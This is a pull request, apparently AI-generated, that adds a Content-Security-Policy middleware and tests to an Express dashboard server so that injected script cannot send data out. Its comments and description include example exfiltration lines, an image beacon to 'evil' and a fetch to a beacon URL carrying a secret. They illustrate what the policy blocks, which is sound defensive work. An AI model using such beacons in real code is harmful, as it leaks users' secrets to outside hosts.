### PR TITLE
feat(security): serve a Content-Security-Policy, closing the exfiltration channel

### DIFF
--- a/companion/src/http/securityHeaders.ts
+++ b/companion/src/http/securityHeaders.ts
@@ -1,0 +1,67 @@
+import type { Request, RequestHandler, Response, NextFunction } from "express";
+
+/**
+ * Content-Security-Policy for every companion response.
+ *
+ * WHY THIS EXISTS: nothing served a CSP before, which is what turned the explain-panel XSS (#281)
+ * from a nuisance into a critical finding — an injected inline handler simply ran, in the origin
+ * that holds every case, the provider API keys, and the server actions. `public/dashboard.html` is
+ * ~16k lines built almost entirely from `innerHTML` string concatenation, so that bug class will
+ * recur; a CSP is what makes the next instance survivable rather than severe.
+ *
+ * ── What this policy deliberately does NOT do ────────────────────────────────────────────────
+ * It does not mention `script-src`, `style-src`, or `default-src`. That is not an oversight.
+ *
+ * The dashboard carries ~80 inline `on*=` handlers, 10 inline `<script>` blocks, and ~1157
+ * `style=""` attributes. Any of those three directives — `default-src` included, because the other
+ * two fall back to it — would break all of them on the spot. Nor would adding them with
+ * `'unsafe-inline'` buy anything: `'unsafe-inline'` is precisely what permits `onerror=` to run, so
+ * such a policy would stop nothing. A nonce does not rescue this either — nonces whitelist
+ * `<script>` BLOCKS and never inline event handlers, which are unconditionally banned the moment
+ * `'unsafe-inline'` is dropped.
+ *
+ * Blocking injected script therefore requires converting all ~80 handlers to `addEventListener`
+ * first. That is a separate change. What is here is the hardening available WITHOUT it, which is
+ * real: an injected script still runs, but it cannot phone home.
+ *
+ * ── The directives ───────────────────────────────────────────────────────────────────────────
+ *  - `connect-src 'self'` — the one that carries weight today. The dashboard makes zero
+ *    cross-origin fetches (all enrichment is proxied server-side), so confining egress costs
+ *    nothing and denies injected script its exfiltration channel: no beaconing case contents,
+ *    API keys, or session state to an attacker host. XSS that cannot exfiltrate is far less useful.
+ *    `'self'` also covers the same-origin `ws://…/ws` live feed (CSP3 matches ws/wss against the
+ *    document's own origin).
+ *  - `img-src 'self' data:` — `data:` is required: the dashboard inlines 27 data:image/svg icons.
+ *    Pinning it still closes the classic `new Image().src = "https://evil/?" + secret` side channel.
+ *  - `object-src 'none'` — `<object>`/`<embed>` are a script-execution path of their own.
+ *  - `base-uri 'none'` — stops an injected `<base>` silently re-pointing every relative URL.
+ *  - `form-action 'none'` — all five dashboard `<form>`s are `onsubmit="return false"` and never
+ *    navigate, so this is free; it stops an injected form POSTing anywhere.
+ *  - `frame-ancestors 'none'` — clickjacking. Nothing frames the dashboard.
+ *
+ * Blob downloads (Sigma drafts, CSV exports) use `a[download]` with `URL.createObjectURL` and are
+ * governed by none of the above. The `/mobile` PWA's service worker and web manifest are
+ * same-origin, and with no `default-src` present they are unrestricted here.
+ */
+export const CSP_POLICY = [
+  "img-src 'self' data:",
+  "connect-src 'self'",
+  "object-src 'none'",
+  "base-uri 'none'",
+  "form-action 'none'",
+  "frame-ancestors 'none'",
+].join("; ");
+
+/**
+ * Express middleware stamping {@link CSP_POLICY} on every response.
+ *
+ * Applied to API responses as well as documents. A JSON body is not a script host, but a uniform
+ * header costs nothing and leaves no route whose response an attacker can steer into a document
+ * context without the policy attached.
+ */
+export function createSecurityHeaders(): RequestHandler {
+  return (_req: Request, res: Response, next: NextFunction): void => {
+    res.setHeader("Content-Security-Policy", CSP_POLICY);
+    next();
+  };
+}

--- a/companion/src/server.ts
+++ b/companion/src/server.ts
@@ -150,6 +150,7 @@ import {
   parseAllowedHosts,
   parseAllowedHostSuffixes,
 } from "./http/originGuard.js";
+import { createSecurityHeaders } from "./http/securityHeaders.js";
 import { getAiLimiter } from "./http/rateLimiter.js";
 import { TemplateStore } from "./analysis/templateStore.js";
 import { diffTimeline, addedForensicEvents } from "./analysis/timelineDiff.js";
@@ -690,6 +691,13 @@ export function createApp(store: CaseStore, options: AppOptions = {}): Express {
     allowedHosts: options.allowedHosts,
     allowedHostSuffixes: options.allowedHostSuffixes,
   }));
+
+  // Content-Security-Policy on every response. Deliberately does NOT constrain script/style — the
+  // dashboard's ~80 inline handlers and ~1157 style attributes have to be converted first, and a
+  // policy carrying 'unsafe-inline' would block nothing anyway. What this DOES buy while inline
+  // script is still allowed is egress: connect-src/img-src pin network access to this origin, so an
+  // injected script (see #281) cannot beacon case data or API keys out. See http/securityHeaders.ts.
+  app.use(createSecurityHeaders());
 
   // Demo mode guard: allow all GETs and the manual reset route; block everything else.
   // This makes the public Railway demo safe — visitors can browse the pre-seeded case but

--- a/companion/tests/http/securityHeaders.test.ts
+++ b/companion/tests/http/securityHeaders.test.ts
@@ -1,0 +1,68 @@
+import { describe, it, expect } from "vitest";
+import express, { type Express } from "express";
+import request from "supertest";
+import { CSP_POLICY, createSecurityHeaders } from "../../src/http/securityHeaders.js";
+
+// A minimal app carrying the headers plus one route of each shape the real server exposes.
+function withHeaders(): Express {
+  const app = express();
+  app.use(createSecurityHeaders());
+  app.get("/dashboard", (_req, res) => res.type("html").send("<!doctype html><p>hi"));
+  app.get("/cases/abc", (_req, res) => res.status(200).json({ id: "abc" }));
+  return app;
+}
+
+/** Split the CSP header into `directive -> source list` for assertions that don't care about order. */
+function directives(header: string): Record<string, string> {
+  const out: Record<string, string> = {};
+  for (const part of header.split(";")) {
+    const [name, ...sources] = part.trim().split(/\s+/);
+    if (name) out[name] = sources.join(" ");
+  }
+  return out;
+}
+
+describe("createSecurityHeaders — CSP on every response", () => {
+  it("sends a Content-Security-Policy on the dashboard document", async () => {
+    const res = await request(withHeaders()).get("/dashboard");
+    expect(res.headers["content-security-policy"]).toBe(CSP_POLICY);
+  });
+
+  it("sends it on API responses too, so an injected script has no unguarded route to abuse", async () => {
+    const res = await request(withHeaders()).get("/cases/abc");
+    expect(res.headers["content-security-policy"]).toBe(CSP_POLICY);
+  });
+});
+
+describe("CSP_POLICY — the directives, and deliberately nothing more", () => {
+  const d = directives(CSP_POLICY);
+
+  // Step 1 — free hardening. None of these interact with inline code, so nothing can break.
+  it("forbids framing, plugins, <base> rewrites and form posts", () => {
+    expect(d["frame-ancestors"]).toBe("'none'"); // clickjacking
+    expect(d["object-src"]).toBe("'none'");       // <object>/<embed> script smuggling
+    expect(d["base-uri"]).toBe("'none'");         // an injected <base> re-pointing every relative URL
+    expect(d["form-action"]).toBe("'none'");      // all 5 dashboard forms are onsubmit="return false"
+  });
+
+  // Step 2 — the one that carries real weight while inline script is still allowed: an injected
+  // script cannot beacon case data, provider API keys, or session state to an attacker host.
+  it("confines network egress to this origin", () => {
+    expect(d["connect-src"]).toBe("'self'");
+  });
+
+  // Step 3 — the dashboard inlines 27 data:image/svg icons, so data: must stay allowed for images.
+  it("allows same-origin and data: images, nothing else", () => {
+    expect(d["img-src"]).toBe("'self' data:");
+  });
+
+  // The guard rail on this PR's scope. The dashboard carries ~80 inline on*= handlers, 10 inline
+  // <script> blocks and ~1157 style="" attributes. Constraining script/style — directly or via a
+  // default-src fallback — would break all of them, so this policy must not mention them at all.
+  // Removing inline script is a separate change that has to convert those handlers first.
+  it("does not constrain scripts or styles, directly or by default-src fallback", () => {
+    expect(d["default-src"]).toBeUndefined();
+    expect(d["script-src"]).toBeUndefined();
+    expect(d["style-src"]).toBeUndefined();
+  });
+});


### PR DESCRIPTION
Steps 1–3 of the CSP work identified while reviewing #281/#282. Step 4 (removing inline script) is deliberately **not** here — see below.

## Why

Nothing served a CSP. That absence is exactly what made #281 critical rather than cosmetic: the injected inline handler *ran*, in the origin that holds every case, the provider API keys, and the server actions. `public/dashboard.html` is ~16k lines built almost entirely from `innerHTML` concatenation, so this bug class will recur.

## The policy

```
img-src 'self' data:; connect-src 'self'; object-src 'none';
base-uri 'none'; form-action 'none'; frame-ancestors 'none'
```

`connect-src`/`img-src` are the ones that carry weight today. An injected script still runs — but it can no longer beacon case contents or API keys anywhere. **XSS that cannot exfiltrate is far less useful.**

The rest is free hardening: nothing frames the dashboard, all five `<form>`s are `onsubmit="return false"` and never navigate, and no `<object>`/`<embed>`/`<base>` is used.

## What is deliberately absent, and why

**No `script-src`, `style-src`, or `default-src`.** This is the important design decision, not an oversight.

The dashboard carries ~80 inline `on*=` handlers, 10 inline `<script>` blocks, and ~1157 `style=""` attributes. Any of those three directives — `default-src` included, since the other two fall back to it — breaks all of them immediately.

And the tempting compromise doesn't work: adding `script-src 'self' 'unsafe-inline'` would block **nothing**, because `'unsafe-inline'` is precisely what permits `onerror=` to run. A nonce doesn't rescue it either — nonces whitelist `<script>` *blocks* and never inline event handlers, which are unconditionally banned the moment `'unsafe-inline'` is dropped.

So blocking injected script requires converting all ~80 handlers to `addEventListener` first. Only 6 are built inside template literals; the rest are static markup, so it's mechanical but out of scope here.

A test asserts these three directives stay absent, so the scope boundary is enforced rather than described.

## Verified in a real browser, not assumed

Served the app and drove it:

| Check | Result |
|---|---|
| Dashboard renders, 30 inline handlers intact | ✅ zero CSP violations |
| Same-origin `fetch('/health')` | ✅ HTTP 200 |
| WebSocket `ws://<host>/ws` on a real case | ✅ **OPEN** (readyState 1), no violation |
| Cross-origin `fetch('https://example.com/beacon?secret=…')` | 🛑 **BLOCKED**, `connect-src` violation |

The WebSocket was the one genuine risk — `connect-src 'self'` had to cover the same-origin `ws://` live feed. It does, confirmed against a real case rather than inferred from the spec.

Also checked and unaffected: blob downloads (Sigma drafts, CSV exports) use `a[download]`, which none of these directives govern; the `/mobile` PWA service worker and web manifest are same-origin and unrestricted with no `default-src` present.

## Verification

- Companion suite: **419 files / 5073 tests pass**
- `tsc --noEmit` clean
- New tests written before the module existed (watched fail, then pass)

## Follow-up

Step 4 — convert the ~80 inline handlers, then add `script-src 'self'` — is the change that actually stops injected script executing. Worth deciding before #284 (interactive self-contained HTML report) merges, since that artifact is likely to want inline everything.

🤖 Generated with [Claude Code](https://claude.com/claude-code)